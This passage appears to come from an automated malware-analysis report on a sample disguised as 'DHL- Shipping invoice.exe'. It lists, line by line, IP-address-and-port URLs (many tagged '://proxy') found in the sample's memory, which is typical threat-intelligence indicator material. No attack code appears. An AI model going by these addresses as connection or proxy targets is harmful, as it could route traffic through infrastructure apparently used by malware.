                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.197:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.32
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.32://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.32:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981545000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.37
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982027000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.37:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.58
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.58://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.58:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.89
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.89://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.89:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.97
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.97://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.97:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.102
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.102://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.102:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.107
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.107://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.107:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.128:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.145:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.150://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.150:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98042D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.153:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.38
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.38://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.38:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.60
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.60://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.60:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.77
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9834B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.77://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9834B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.77:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.78
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.78://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.78:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.83
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.83://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.83:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.96
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.96://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.96:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.187.242://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.200.220
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.200.220://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.200.220:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.206.105
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.206.105://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.206.105:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.209.12
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.209.12://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.209.12:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.231.3
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.231.3://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.231.3:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.242.194://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.242.194:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.25.204
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.25.204://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.25.204:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.250.212://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.250.212:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.253.69
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.253.69://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.253.69:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.254.127
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.254.127://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.254.127:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.255.224
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.255.224://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.255.224:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.98
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.98://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.98:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.35.15
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.35.15://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.35.15:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.38.96
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.38.96://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.38.96:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:43520://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:62543
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:62543://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.209.53.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.209.53.182:61734
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.209.53.182:61734://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:18421
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:18421://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:31673
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:31673://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:44416
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:44416://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:13765
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:13765://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:17068
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:17068://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:20238
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:20238://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:26131
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:26131://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:27324
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:27324://proxy8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:47275
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:47275://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:58964
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:58964://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:63614
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:63614://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:64568
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:64568://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:64735://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.250.16:64768
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.250.16:64768://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.252.206:54321
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.252.206:54321://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.49.27
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.49.27://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.49.27:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.2.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.2.186:45708
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.2.186:45708://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.29.243:9123
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.29.243:9123://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:63010
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:63010://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.106.48:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.106.48:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.176
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.176.75:44163
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.176.75:44163://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.64.199.79:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9822EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.64.199.79:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.75.211.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.75.211.222:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.75.211.222:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.196:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.196:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.100.87.209:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.100.87.209:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.100.91.212:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.100.91.212:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.106.10.226:51630://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221:8197
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221:8197://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.29.174.242:10800
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.29.174.242:10800://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.104:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.104:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.120.32.135:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.120.32.135:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.192.65.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.192.65.34:5020
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.192.65.34:5020://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.197.103.58:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.197.103.58:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.31.110.126:45517
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.31.110.126:45517://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.31.110.126:45517U0
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.31.197.145:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.31.197.145:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.58.96.11:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.77.9.22:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.77.9.22:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.9.32.90
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.9.32.90:39433
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.9.32.90:39433://proxy
